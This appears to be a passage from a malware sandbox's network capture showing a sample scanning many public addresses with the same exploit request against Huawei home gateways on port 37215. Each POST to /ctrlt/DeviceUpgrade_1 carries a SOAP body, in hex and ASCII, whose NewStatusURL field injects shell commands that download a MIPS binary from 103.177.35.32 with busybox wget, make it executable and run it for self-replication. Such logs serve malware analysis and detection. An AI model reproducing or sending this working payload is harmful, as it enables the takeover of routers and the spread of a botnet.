                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1581192.168.2.234851241.206.248.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.551953077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1582192.168.2.2340966197.233.186.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555126905 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1583192.168.2.2347630157.235.140.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555130005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1584192.168.2.2338164221.195.29.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555182934 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1585192.168.2.2351504200.20.205.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555319071 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1586192.168.2.2338674197.16.140.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555330992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1587192.168.2.2333920197.46.80.10237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555354118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1588192.168.2.233490241.12.48.24937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555367947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1589192.168.2.235401441.193.61.15337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555387974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1590192.168.2.2334198157.50.55.4637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.555389881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
